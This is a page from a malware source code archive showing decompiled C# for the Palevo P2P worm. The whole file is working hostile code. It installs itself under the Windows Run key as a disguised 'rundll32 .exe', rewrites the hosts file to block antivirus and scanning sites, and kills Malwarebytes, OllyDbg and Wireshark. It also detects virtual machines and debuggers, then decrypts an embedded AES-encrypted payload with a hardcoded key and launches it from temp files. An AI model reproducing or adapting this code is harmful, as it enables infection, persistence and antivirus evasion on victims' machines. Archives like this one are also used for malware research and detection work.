ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-22 19:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
71cdcf7dce
MalwareSourceCode/MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80/pizde.cs

640 lines
60 KiB
C#
Raw Normal View History

auto-decompiled msil via petikvx add
2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: pizde
// Assembly: 66666, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2453255D-06D9-4B55-8A59-D5B108E7DFD5
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using My;
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;
using System.Windows.Forms;
[StandardModule]
internal sealed class pizde
{
private static string iohouh7877 = "hhhhhhhhhheeeee";
private static string HostEditing = "%28%";
private static string antis = "%29%";
private static string stuff = "%something%";
private static object Devices;
private static string Grafikadapter;
private static string RegionA = "SELECT * FROM Win32_VideoController";
[STAThread]
public static void Main()
{
label_0:
int num1;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = 1;
label_1:
int num3 = 2;
string processName = Process.GetCurrentProcess().ProcessName;
label_2:
num3 = 3;
Process.GetProcessesByName(processName);
label_3:
num3 = 4;
if (Operators.CompareString(pizde.iohouh7877, "hhhhhhhhhheeeee", false) != 0)
goto label_11;
label_4:
num3 = 5;
object tempPath1 = (object) Path.GetTempPath();
label_5:
num3 = 6;
object executablePath = (object) Application.ExecutablePath;
label_6:
num3 = 7;
object fullPath = (object) Path.GetFullPath(Conversions.ToString(executablePath));
label_7:
num3 = 8;
FileAttributes fileAttributes1 = FileAttributes.Hidden | FileAttributes.System;
label_8:
num3 = 9;
MyProject.Computer.Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true).SetValue("rundll32", Operators.ConcatenateObject(tempPath1, (object) "rundll32 .exe"));
label_9:
num3 = 10;
FileSystem.FileCopy(Conversions.ToString(fullPath), Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject(tempPath1, (object) "\\"), (object) "rundll32 .exe")));
label_10:
num3 = 11;
File.SetAttributes(Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject(tempPath1, (object) "\\"), (object) "rundll32 .exe")), fileAttributes1);
label_11:
num3 = 13;
if (Operators.CompareString(pizde.HostEditing, "hhhhhhhhhheeeee", false) != 0)
goto label_13;
label_12:
num3 = 14;
pizde.HostEdit();
goto label_14;
label_13:
num3 = 16;
label_14:
num3 = 18;
pizde.AntiMalwarebytes();
label_15:
num3 = 19;
pizde.AntiOllydbg();
label_16:
num3 = 20;
pizde.AntiWireshark();
label_17:
num3 = 21;
pizde.AntiVirtualBox();
label_18:
num3 = 22;
pizde.AntiVirtualPC();
label_19:
num3 = 23;
pizde.AntiVmWare();
label_20:
num3 = 24;
pizde.IsDebuggerPresent();
label_21:
num3 = 25;
string str1;
string s1 = str1;
label_22:
num3 = 26;
pizde.okitokjwe33(Convert.FromBase64String(s1));
label_23:
num3 = 27;
string s2 = "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
label_24:
num3 = 28;
byte[] data1 = pizde.okitokjwe33(Convert.FromBase64String(s2));
label_25:
num3 = 29;
string str2;
string s3 = str2;
label_26:
num3 = 30;
pizde.decrypt(Convert.FromBase64String(s3), "parola");
label_27:
num3 = 31;
string str3;
string s4 = str3;
label_28:
num3 = 32;
byte[] data2 = pizde.okitokjwe33(Convert.FromBase64String(s4));
label_29:
num3 = 33;
Encoding.GetEncoding(1252).GetBytes(s1);
label_30:
num3 = 34;
object tempPath2 = (object) Path.GetTempPath();
label_31:
num3 = 35;
Directory.CreateDirectory(Conversions.ToString(Operators.ConcatenateObject(tempPath2, (object) "winamp")));
label_32:
num3 = 36;
Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(tempPath2, (object) "\\"), (object) "winamp"), (object) "\\"), (object) "svhost.exe"));
label_33:
num3 = 37;
string sourceFileName = "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe";
label_34:
num3 = 38;
string str4 = Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(tempPath2, (object) "\\"), (object) "winamp"), (object) "\\"), (object) "svhost.exe"));
label_35:
num3 = 39;
if (File.Exists(str4))
goto label_37;
label_36:
num3 = 40;
File.Copy(sourceFileName, str4);
label_37:
num3 = 42;
FileAttributes fileAttributes2 = FileAttributes.Hidden | FileAttributes.System;
label_38:
num3 = 43;
File.SetAttributes(Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(tempPath2, (object) "\\"), (object) "winamp"), (object) "\\"), (object) "svhost.exe")), fileAttributes2);
label_39:
num3 = 44;
pizde.IsProcessRunning4("sandboxierpcss.exe");
label_40:
num3 = 46;
if (pizde.IsProcessRunning2("%temp%.exe"))
goto label_45;
label_41:
num3 = 47;
if (pizde.IsProcessRunning5("rundll32 .exe"))
goto label_45;
label_42:
num3 = 48;
string temp1 = MyProject.Computer.FileSystem.SpecialDirectories.Temp;
label_43:
num3 = 49;
MyProject.Computer.FileSystem.WriteAllBytes(temp1 + "\\%temp%.exe", data2, false);
label_44:
num3 = 50;
Process.Start(temp1 + "\\%temp%.exe");
label_45:
num3 = 53;
if (pizde.IsProcessRunning3("%tmp%.exe"))
goto label_49;
label_46:
num3 = 54;
string temp2 = MyProject.Computer.FileSystem.SpecialDirectories.Temp;
label_47:
num3 = 55;
MyProject.Computer.FileSystem.WriteAllBytes(temp2 + "\\%tmp%.exe", data1, false);
label_48:
num3 = 56;
Process.Start(temp2 + "\\%tmp%.exe");
label_49:
ProjectData.EndApp();
goto label_56;
label_51:
num2 = num3;
switch (num1)
{
case 1:
int num4 = num2 + 1;
num2 = 0;
switch (num4)
{
case 1:
goto label_0;
case 2:
goto label_1;
case 3:
goto label_2;
case 4:
goto label_3;
case 5:
goto label_4;
case 6:
goto label_5;
case 7:
goto label_6;
case 8:
goto label_7;
case 9:
goto label_8;
case 10:
goto label_9;
case 11:
goto label_10;
case 12:
case 13:
goto label_11;
case 14:
goto label_12;
case 15:
case 17:
case 18:
goto label_14;
case 16:
goto label_13;
case 19:
goto label_15;
case 20:
goto label_16;
case 21:
goto label_17;
case 22:
goto label_18;
case 23:
goto label_19;
case 24:
goto label_20;
case 25:
goto label_21;
case 26:
goto label_22;
case 27:
goto label_23;
case 28:
goto label_24;
case 29:
goto label_25;
case 30:
goto label_26;
case 31:
goto label_27;
case 32:
goto label_28;
case 33:
goto label_29;
case 34:
goto label_30;
case 35:
goto label_31;
case 36:
goto label_32;
case 37:
goto label_33;
case 38:
goto label_34;
case 39:
goto label_35;
case 40:
goto label_36;
case 41:
case 42:
goto label_37;
case 43:
goto label_38;
case 44:
goto label_39;
case 45:
case 46:
goto label_40;
case 47:
goto label_41;
case 48:
goto label_42;
case 49:
goto label_43;
case 50:
goto label_44;
case 51:
case 52:
case 53:
goto label_45;
case 54:
goto label_46;
case 55:
goto label_47;
case 56:
goto label_48;
case 57:
goto label_49;
case 58:
goto label_56;
}
break;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_51;
}
throw ProjectData.CreateProjectError(-2146828237);
label_56:
if (num2 == 0)
return;
ProjectData.ClearProjectError();
}
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern int IsDebuggerPresent();
public static void Main2()
{
if (pizde.IsDebuggerPresent() == 1)
Console.WriteLine("Debugger Is Present");
else
Console.WriteLine("Debugger Not Present");
}
private static void HostEdit()
{
StreamWriter streamWriter = new StreamWriter(Environment.GetFolderPath(Environment.SpecialFolder.System) + "\\drivers\\etc\\\\hosts");
streamWriter.Write("127.0.0.1 www.virustotal.com");
streamWriter.Write(Environment.NewLine);
streamWriter.Write("127.0.0.1 virustotal.com");
streamWriter.Write(Environment.NewLine);
streamWriter.Write("127.0.0.1 novirusthanks.org");
streamWriter.Write(Environment.NewLine);
streamWriter.Write("127.0.0.1 vscan.novirusthanks.org");
streamWriter.Write(Environment.NewLine);
streamWriter.Write("127.0.0.1 virusscan.jotti.org");
streamWriter.Write(Environment.NewLine);
streamWriter.Write("127.0.0.1 www.virusscan.jotti.org");
streamWriter.Write(Environment.NewLine);
streamWriter.Write("127.0.0.1 virscan.org");
streamWriter.Write(Environment.NewLine);
streamWriter.Write("127.0.0.1 www.virscan.org");
streamWriter.Write(Environment.NewLine);
streamWriter.Write("127.0.0.1 virus-trap.org");
streamWriter.Write(Environment.NewLine);
streamWriter.Write("127.0.0.1 www.virus-trap.org");
streamWriter.Write(Environment.NewLine);
streamWriter.Write("127.0.0.1 filterbit.com");
streamWriter.Write(Environment.NewLine);
streamWriter.Write("127.0.0.1 www.filterbit.com");
streamWriter.Write(Environment.NewLine);
streamWriter.Write("127.0.0.1 viruschief.com");
streamWriter.Write(Environment.NewLine);
streamWriter.Write("127.0.0.1 www.viruschief.com");
streamWriter.Write(Environment.NewLine);
streamWriter.Write("127.0.0.1 kaspersky.com");
streamWriter.Write(Environment.NewLine);
streamWriter.Write("127.0.0.1 www.kaspersky.com");
streamWriter.Dispose();
}
public static bool AntiVirtualBox()
{
int num1;
bool flag;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = 2;
pizde.getDevices();
flag = Operators.CompareString(pizde.Grafikadapter, "VirtualBox Graphics Adapter", false) == 0;
goto label_7;
label_2:
num2 = -1;
switch (num1)
{
case 2:
ProjectData.EndApp();
goto label_7;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_2;
}
throw ProjectData.CreateProjectError(-2146828237);
label_7:
int num3 = flag ? 1 : 0;
if (num2 == 0)
return num3 != 0;
ProjectData.ClearProjectError();
return num3 != 0;
}
public static bool AntiVmWare()
{
int num1;
bool flag;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = 2;
pizde.getDevices();
flag = Operators.CompareString(pizde.Grafikadapter, "VMware SVGA II", false) == 0;
goto label_7;
label_2:
num2 = -1;
switch (num1)
{
case 2:
ProjectData.EndApp();
goto label_7;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_2;
}
throw ProjectData.CreateProjectError(-2146828237);
label_7:
int num3 = flag ? 1 : 0;
if (num2 == 0)
return num3 != 0;
ProjectData.ClearProjectError();
return num3 != 0;
}
public static bool AntiVirtualPC()
{
int num1;
bool flag;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = 2;
pizde.getDevices();
flag = Operators.CompareString(pizde.Grafikadapter, "VM Additions S3 Trio32/64", false) == 0;
goto label_7;
label_2:
num2 = -1;
switch (num1)
{
case 2:
ProjectData.EndApp();
goto label_7;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_2;
}
throw ProjectData.CreateProjectError(-2146828237);
label_7:
int num3 = flag ? 1 : 0;
if (num2 == 0)
return num3 != 0;
ProjectData.ClearProjectError();
return num3 != 0;
}
private static void getDevices()
{
// ISSUE: unable to decompile the method.
}
public static void AntiMalwarebytes()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "mbam", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void AntiOllydbg()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "ollydbg", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void AntiWireshark()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "wireshark", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
private static bool IsProcessRunning2(string name)
{
Process[] processesByName = Process.GetProcessesByName("%temp%");
int index = 0;
if (index >= processesByName.Length)
{
bool flag;
return flag;
}
return processesByName[index] != null;
}
private static bool IsProcessRunning3(string name)
{
Process[] processesByName = Process.GetProcessesByName("%tmp%");
int index = 0;
if (index >= processesByName.Length)
{
bool flag;
return flag;
}
return processesByName[index] != null;
}
private static bool IsProcessRunning4(string name)
{
Process[] processesByName = Process.GetProcessesByName("sandboxierpcss");
int index = 0;
if (index >= processesByName.Length)
{
bool flag;
return flag;
}
return processesByName[index] != null;
}
private static bool IsProcessRunning5(string name)
{
Process[] processesByName = Process.GetProcessesByName("rundll32 ");
int index = 0;
if (index >= processesByName.Length)
{
bool flag;
return flag;
}
return processesByName[index] != null;
}
public static byte[] okitokjwe33(byte[] data)
{
using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
{
rijndaelManaged.IV = new byte[16]
{
(byte) 1,
(byte) 2,
(byte) 3,
(byte) 4,
(byte) 5,
(byte) 6,
(byte) 7,
(byte) 8,
(byte) 9,
(byte) 1,
(byte) 2,
(byte) 3,
(byte) 4,
(byte) 5,
(byte) 6,
(byte) 7
};
rijndaelManaged.Key = new byte[16]
{
(byte) 7,
(byte) 6,
(byte) 5,
(byte) 4,
(byte) 3,
(byte) 2,
(byte) 1,
(byte) 9,
(byte) 8,
(byte) 7,
(byte) 6,
(byte) 5,
(byte) 4,
(byte) 3,
(byte) 2,
(byte) 1
};
return rijndaelManaged.CreateDecryptor().TransformFinalBlock(data, 0, data.Length);
}
}
public static byte[] decrypt(byte[] message, string password)
{
byte[] bytes = Encoding.Default.GetBytes(password);
int num1 = (int) message[checked (message.Length - 1)] ^ 112;
byte[] arySrc = new byte[checked (message.Length + 1)];
int num2 = checked (message.Length - 1);
int index1 = 0;
while (index1 <= num2)
{
int index2;
arySrc[index1] = checked ((byte) ((int) message[index1] ^ num1 ^ (int) bytes[index2]));
if (index2 == checked (password.Length - 1))
index2 = 0;
else
checked { ++index2; }
checked { ++index1; }
}
return (byte[]) Microsoft.VisualBasic.CompilerServices.Utils.CopyArray((Array) arySrc, (Array) new byte[checked (message.Length - 2 + 1)]);
}
}
Reference in New Issue Copy Permalink